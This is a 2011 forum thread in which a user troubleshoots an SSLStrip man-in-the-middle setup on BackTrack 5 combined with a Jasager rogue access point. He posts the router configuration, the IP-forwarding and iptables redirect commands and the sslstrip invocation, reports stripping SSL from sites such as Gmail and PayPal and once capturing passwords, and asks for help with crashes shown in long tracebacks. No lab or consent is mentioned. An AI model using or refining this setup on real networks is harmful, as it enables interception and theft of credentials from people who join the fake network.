Sslstrip & Backtrack 5

[bobbyb1980]

Hello all. I was having some problems with SSL Strip 0.8 and Backtrack 5. What I am trying to do is use Jasager on an Open Mesh router configured with ICS and use SSL Strip from there. I am currently using the jasagerPwn script to do this, and the actual internet connection sharing works perfectly.

What does not work so well is SSL Strip. As soon as I start SSL Strip the connection lags for a minute or so, then completely dies. Sometimes I am able to get it working for a few minutes, but it almost eventually always dies. This is the error I always receive upon start/termination of the connection:

logging.warning("Host resolution error: " + error) exceptions/TypeError: cannot conatenate 'str' and 'instance' objects

I noticed that on the latest version of Backtrack 5 SSLStrip 0.8 is installed so I tried to install 0.9. I used apt-get remove sslstrip and ti told me it successfully removed, but it did not. When I downloaded sslstrip 0.9 and tried to run the install.ph script, it tells me "Permission Denied" despite the fact that I am root. I cannot get the install script to run in BT5 no matter how many times I su the session.

Considering I switched to BT5 from Ubuntu I'd like to avoid switching OS's and find a solution to the problem. I've found a few topics about this issue across the internet but none seem to offer a solution.

Anyone have any ideas?

[Jamo]

To run that script you must make it executable, chmod +x filename and then ./filename.

What commands do you use to run sslstrip? And. Are you running it on bt5 or jasager router?

If on bt5 what commands do you use?

Edited September 12, 2011 by Jarmo

[bobbyb1980]

I stopped using the jasagerPwn script and manually configured ICS which seems to have a little more stability. Here are the settings used to configure ICS (ICS works fine).

uci set network.lan.ipaddr=172.20.0.2
uci set network.lan.gateway=172.20.0.1
uci set network.lan.dns=192.168.1.254
uci commit network

Here are the routing settings and what I use to run SSLStrip (SSLStrip is run from the attacker machine and not router)

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
sudo iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
sudo ifconfig eth0 172.20.0.1 netmask 255.255.255.0
sudo dhclient wlan0
sslstrip -l 64123 -f sslstrip-0.8/lock.ico

Now I can share internet fine and I can go to websites like gmail.com or paypal.com and there will be no SSL. I have succeeded one time in getting passwords to print to the ssl logfile but I get the following error. Sometimes it still continues logging after the error, sometimes no. I just got it working in the past few hours so I need to test it further. I should also note that as previously mentioned I tried to uninstall sslstrip-0.8 (don't know whether it suceeded) and install sslstrip-0.9 (after chmodding the script I was able to run the install script, but it did not do anything, just a blinking cursor). However, I can run sslstrip-0.9 without installing it seemingly fine (however I do get the following error)

sslstrip -l 64123 -f 

sslstrip 0.8 by Moxie Marlinspike running...
Traceback (most recent call last):
  File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 146, in _doReadOrWrite
    why = getattr(selectable, method)()
  File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 460, in doRead
    return self.protocol.dataReceived(data)
  File "/usr/lib/python2.6/dist-packages/twisted/protocols/basic.py", line 259, in dataReceived
    return self.rawDataReceived(data)
  File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 537, in rawDataReceived
    self.handleResponseEnd()
  File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 110, in handleResponseEnd
    HTTPClient.handleResponseEnd(self)
  File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd
    self.handleResponse(B)
  File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 121, in handleResponse
    self.shutdown()
  File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 141, in shutdown
    self.client.finish()
  File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish
    "Request.finish called on a request after its connection was lost; "
exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.
^CTraceback (most recent call last):
  File "/usr/lib/python2.6/dist-packages/twisted/internet/defer.py", line 213, in addCallbacks
    self._runCallbacks()
  File "/usr/lib/python2.6/dist-packages/twisted/internet/defer.py", line 371, in _runCallbacks
    self.result = callback(self.result, *args, **kw)
  File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 409, in _continueFiring
    callable(*args, **kwargs)
  File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 595, in disconnectAll
    failure.Failure(main.CONNECTION_LOST))
--- <exception caught here> ---
  File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
  File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 677, in connectionLost
    Connection.connectionLost(self, reason)
  File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 519, in connectionLost
    protocol.connectionLost(reason)
  File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 489, in connectionLost
    self.handleResponseEnd()
  File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 110, in handleResponseEnd
    HTTPClient.handleResponseEnd(self)
  File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd
    self.handleResponse(B)
  File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 121, in handleResponse
    self.shutdown()
  File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 141, in shutdown
    self.client.finish()
  File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish
    "Request.finish called on a request after its connection was lost; "
exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.

Any ideas would be greatly appreciated.

Edited September 12, 2011 by bobbyb1980

[abs0lut3z33r0]

I also get the same error . Did you get solution to this problem?